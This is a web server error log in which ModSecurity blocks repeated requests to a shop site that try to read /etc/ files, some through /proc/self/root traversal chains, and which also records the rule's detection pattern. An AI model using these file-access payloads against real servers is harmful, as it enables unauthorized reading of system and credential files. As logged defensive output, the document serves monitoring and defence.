[Thu Mar 19 11:46:45.003909 2026] [:error] [pid 26799:tid 140411674785536] [client 57.141.18.22:38288] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMVda6ubjKNq_cu4Zb5gAAA0g"]
[Thu Mar 19 11:46:45.409348 2026] [mime_magic:error] [pid 27403:tid 140411582465792] (70014)End of file found: [client 57.141.18.37:38226] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:46:47.439711 2026] [:error] [pid 31803:tid 140411699963648] [client 57.141.18.14:38338] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMV-yqAr6etmhZHNpm7QAAAEU"]
[Thu Mar 19 11:46:47.487237 2026] [:error] [pid 17887:tid 140411616036608] [client 57.141.18.3:38340] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMVwkwaGbbGflqUZDKIQAAAM8"]
[Thu Mar 19 11:46:47.822452 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.75:38346] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMV-oXxyEfFpUF8f8UaQAAAUo"]
[Thu Mar 19 11:46:50.891481 2026] [:error] [pid 26799:tid 140411733534464] [client 57.141.18.34:38176] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMWta6ubjKNq_cu4Zb6AAAA0E"]
[Thu Mar 19 11:46:51.129522 2026] [:error] [pid 17653:tid 140411733534464] [client 57.141.18.110:38358] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMW8df6f5d65gmYZR-ewAAAsE"]
[Thu Mar 19 11:46:54.261517 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:56698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMXQkwaGbbGflqUZDKJQAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:57.635761 2026] [:error] [pid 14269:tid 140411708356352] [client 57.141.18.92:38580] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMYQbLMZ6AikZjR9Vj-QAAAAQ"]
[Thu Mar 19 11:46:57.829258 2026] [:error] [pid 14269:tid 140411741927168] [client 57.141.18.8:38590] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMYQbLMZ6AikZjR9Vj-gAAAAA"]
[Thu Mar 19 11:46:58.218953 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.241.31:59886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMYgbLMZ6AikZjR9Vj-wAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:58.273361 2026] [:error] [pid 27403:tid 140411741927168] [client 57.141.18.33:38600] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMYhkFeYa1D6dYQnD3awAAAcA"]
[Thu Mar 19 11:46:58.409467 2026] [:error] [pid 27403:tid 140411674785536] [client 57.141.18.98:38606] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMYhkFeYa1D6dYQnD3bAAAAcg"]
[Thu Mar 19 11:47:02.384709 2026] [:error] [pid 17887:tid 140411666392832] [client 57.141.18.98:38486] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMZgkwaGbbGflqUZDKMAAAAMk"]
[Thu Mar 19 11:47:04.195738 2026] [:error] [pid 17887:tid 140411658000128] [client 57.141.18.8:38724] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMaAkwaGbbGflqUZDKOgAAAMo"]
[Thu Mar 19 11:47:04.231592 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:59890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMaAkwaGbbGflqUZDKOwAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:47:08.121478 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36770] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:47:13.639652 2026] [:error] [pid 27293:tid 140411649607424] [client 57.141.18.10:38984] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMcf-YZRR_7pZ7nDKSUgAAA8s"]
[Thu Mar 19 11:47:13.879572 2026] [:error] [pid 19093:tid 140411699963648] [client 57.141.18.58:38998] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMcV_V7PWP6ixUYl7DgQAAAoU"]
[Thu Mar 19 11:47:15.898636 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:46962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMc8df6f5d65gmYZR-iQAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:47:24.428835 2026] [:error] [pid 14269:tid 140411708356352] [client 57.141.18.115:38890] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMfAbLMZ6AikZjR9VkCgAAAAQ"]
[Thu Mar 19 11:47:25.049024 2026] [:error] [pid 17887:tid 140411641214720] [client 57.141.18.32:39284] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMfQkwaGbbGflqUZDKSgAAAMw"]
[Thu Mar 19 11:47:29.184223 2026] [:error] [pid 31803:tid 140411733534464] [client 57.141.18.61:39064] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMgeyqAr6etmhZHNpnDQAAAEE"]
[Thu Mar 19 11:47:29.189884 2026] [:error] [pid 19093:tid 140411599251200] [client 74.7.241.31:36466] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMgV_V7PWP6ixUYl7DiQAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:47:30.523744 2026] [:error] [pid 27293:tid 140411616036608] [client 57.141.18.42:39428] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMgv-YZRR_7pZ7nDKSXQAAA88"]
[Thu Mar 19 11:47:31.211581 2026] [:error] [pid 27293:tid 140411683178240] [client 57.141.18.93:39438] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMg_-YZRR_7pZ7nDKSXgAAA8c"]
[Thu Mar 19 11:47:37.121830 2026] [proxy_fcgi:error] [pid 30077:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:37478] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:47:38.579620 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.82:39254] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMiv-YZRR_7pZ7nDKSZwAAA8k"]
[Thu Mar 19 11:47:38.597067 2026] [:error] [pid 27293:tid 140411741927168] [client 57.141.18.109:39260] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMiv-YZRR_7pZ7nDKSaQAAA8A"]
[Thu Mar 19 11:47:39.013671 2026] [:error] [pid 31803:tid 140411557287680] [client 57.141.18.72:39596] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMi-yqAr6etmhZHNpnDwAAAFY"]
